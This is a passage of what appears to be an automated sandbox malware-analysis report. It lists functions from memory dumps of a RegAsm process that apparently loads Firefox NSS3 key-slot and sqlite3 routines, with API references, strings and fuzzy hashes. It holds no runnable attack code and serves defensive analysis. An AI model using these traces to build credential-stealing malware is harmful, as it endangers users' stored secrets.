                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9C14971904248EADB15EBE5D956BEDBBB4AF15308F2440BEE406735C2EB781B0CCB25
                                                                                                                                                                                                                                                                  Function 0040E24B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 100stringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                                                                                                                                                                                                  • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                                  • API String ID: 1978830238-2554083253
                                                                                                                                                                                                                                                                  • Opcode ID: 8ab548956084e1ff4340cca3afd96787ef595e383a3a2f368295c4c627d6037d
                                                                                                                                                                                                                                                                  • Instruction ID: df0bb20226c3b77e0592191fdf3089e6707ad72a6792d302173453345bb88c00
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab548956084e1ff4340cca3afd96787ef595e383a3a2f368295c4c627d6037d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13310272600615AFDB04EFAADC81AAF7BA9EF49350F00007EF901EB1D0DE389900CB64
                                                                                                                                                                                                                                                                  Function 6C92FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C92FCBD
                                                                                                                                                                                                                                                                  • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C92FCCC
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C92FCEF
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C92FD32
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C92FD46
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000001), ref: 6C92FD51
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C92FD6D
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C92FD84
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                  • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                  • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                  • Instruction ID: b909d11fdaf800c2f8aca72ba753bb54c30d962a8d3d7db262d6262b607436d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31F1B2D102259BEB008AB4DC05BAF77ACAF5071CF190135DC94A7B05E77AE918C7D2
                                                                                                                                                                                                                                                                  Function 6C946C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_DigestInit), ref: 6C946C66
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C946C94
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C946CA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C946CB9
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C946CD5
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                                                                  • Opcode ID: 39eb90cd478a03278ac6b93fd195dbe7becf2680118fd3dd67100209b7de9d4a
                                                                                                                                                                                                                                                                  • Instruction ID: a00f7679c1f094a9c80c7a4062eff62239f2c1450678147aac8f79f1a45cf707
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39eb90cd478a03278ac6b93fd195dbe7becf2680118fd3dd67100209b7de9d4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16212574B00225DFCB059F549D48B9A3BB5FB52319F08C029E509D7B02DB34D84ACBB1
                                                                                                                                                                                                                                                                  Function 6C916DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,6C917D8F,6C917D8F,?,?), ref: 6C916DC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C96FE08
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C96FE1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C96FE62
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C917D8F,?,?), ref: 6C916DD5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FA0,00000000,?,?,?,?,6C917D8F,?,?), ref: 6C916DF7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916E35
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C96FE29
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C96FE3D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C96FE6F
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916E4C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97116E
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916E82
                                                                                                                                                                                                                                                                    • Part of subcall function 6C916AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C91B21D,00000000,00000000,6C91B219,?,6C916BFB,00000000,?,00000000,00000000,?,?,?,6C91B21D), ref: 6C916B01
                                                                                                                                                                                                                                                                    • Part of subcall function 6C916AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C916B8A
                                                                                                                                                                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C916F1E
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C916F35
                                                                                                                                                                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA38FE0,00000000), ref: 6C916F6B
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C917D8F,?,?), ref: 6C916FE1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 587344769-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                                                                                                                                  • Instruction ID: cefa9582fdfb79ea412f56ca255adf1a4c1b2ef9611e671c7f225ea7ff8aacc0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89911e971a83e6b3a46336248b2b683ec4aafcc773d4c863c0d23f7346fb45df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7718E71D1424A9FEB00CF15CD51BAABBA8FFA4348F154269E848D7B11F770E9A4CB90
                                                                                                                                                                                                                                                                  Function 6C934CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C93AB7F,?,00000000,?), ref: 6C934CB4
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C93AB7F,?,00000000,?), ref: 6C934CC8
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,6C93AB7F,?,00000000,?), ref: 6C934CE0
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C93AB7F,?,00000000,?), ref: 6C934CF4
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?,?,?,6C93AB7F,?,00000000,?), ref: 6C934D03
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,00000000,?), ref: 6C934D10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_Now.NSS3(?,00000000,?), ref: 6C934D26
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C934D98
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C934DDA
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C934E02
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                                                                                                                                  • Instruction ID: a9fbf668a7fdc7bac6c5bbabc2ad9117ce066c0013af967b548e04412f4fde8c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7372963e0a98586a839d80cd84effa52dbbb63c947728711b41028172f913175
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41C9B6A00211ABDB01AF24EC40A667BB8FF2521DF065170EC1C87B15FB36E954CBE1
                                                                                                                                                                                                                                                                  Function 6C8FFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C8FFD18
                                                                                                                                                                                                                                                                  • sqlite3_initialize.NSS3 ref: 6C8FFD5F
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8FFD89
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C8FFD99
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C8FFE3C
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8FFEE3
                                                                                                                                                                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C8FFEEE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                  • String ID: simple
                                                                                                                                                                                                                                                                  • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                  • Opcode ID: b54adfbc81b99d59c34fa68031788be387af1e401b854bc28757e651172597b1
                                                                                                                                                                                                                                                                  • Instruction ID: 4c932ec62554958ae9ec02eba562c22e126b226147a5e86ead2cfe5c1043caec
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b54adfbc81b99d59c34fa68031788be387af1e401b854bc28757e651172597b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D59183B0A012058FDB14CF59CA80A6AB7F1FF94398F25C968D8299F752D731E842CF60
                                                                                                                                                                                                                                                                  Function 6C905CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C905EC9
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C905EED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • misuse, xrefs: 6C905EDB
                                                                                                                                                                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C905EE0
                                                                                                                                                                                                                                                                  • invalid, xrefs: 6C905EBE
                                                                                                                                                                                                                                                                  • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C905E64
                                                                                                                                                                                                                                                                  • API call with %s database connection pointer, xrefs: 6C905EC3
                                                                                                                                                                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C905ED1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: sqlite3_log
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                  • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                  • Opcode ID: b64a2ca23bb3db1089f8f462a342ab3390fb590707d86a588500347200e23f38
                                                                                                                                                                                                                                                                  • Instruction ID: a74f9ad38f928cbc08a9af06f3297815718614b03d58e6f0c053ff1e7d7fb00d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b64a2ca23bb3db1089f8f462a342ab3390fb590707d86a588500347200e23f38
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2081F030B056129BEB19CF29C848B6A77B9BF4130CF29426ED8155BB50D734EC52CBD9
                                                                                                                                                                                                                                                                  Function 6C8EDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8EDDF9
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8EDE68
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C8EDE97
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C8EDEB6
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8EDF78
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                  • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                  • Opcode ID: 5cf966b181e4ac51bdeb928b545ca13e3c68a7475327642210fc2e9bcfa74450
                                                                                                                                                                                                                                                                  • Instruction ID: cd72f6c98dc4ebcc484477fdf54b0d476a49ceb168797ae86a6e2e1c078199c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cf966b181e4ac51bdeb928b545ca13e3c68a7475327642210fc2e9bcfa74450
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9381A6717047119FD724CF25CA80B6A77F1BF8A309F158C2EE8598BA51E731E849C752
                                                                                                                                                                                                                                                                  Function 004103E8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103FD
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410408
